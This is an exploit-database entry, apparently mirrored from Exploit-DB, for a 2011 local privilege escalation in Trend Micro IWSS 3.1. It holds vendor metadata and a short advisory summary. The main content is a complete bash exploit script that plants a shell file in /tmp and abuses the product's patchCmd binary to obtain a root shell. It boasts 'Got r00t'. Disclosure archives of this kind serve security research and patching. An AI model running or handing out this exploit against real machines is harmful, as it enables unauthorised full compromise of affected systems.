header-logo
Suggest Exploit
vendor:
IWSS
by:
Buguroo Offensive Security - jrvilla
N/A
CVSS
HIGH
Local Privilege Escalation
CWE
Product Name: IWSS
Affected Version From: 3.1
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2011

Trendmicro IWSS Local Privilege Escalation Vulnerability

Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.

Mitigation:

No information provided
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/50380/info

Trendmicro IWSS is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.

Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected. 

#!/bin/bash
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com

cd /tmp
echo "[*] Creating shell file"
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
echo "[*] Change permissions"
chmod 755 PatchExe.sh
echo "[*] Got r00t... Its free!"
/opt/trend/iwss/data/patch/bin/patchCmd u root

Navigation

Suggest Exploit

Services By CQR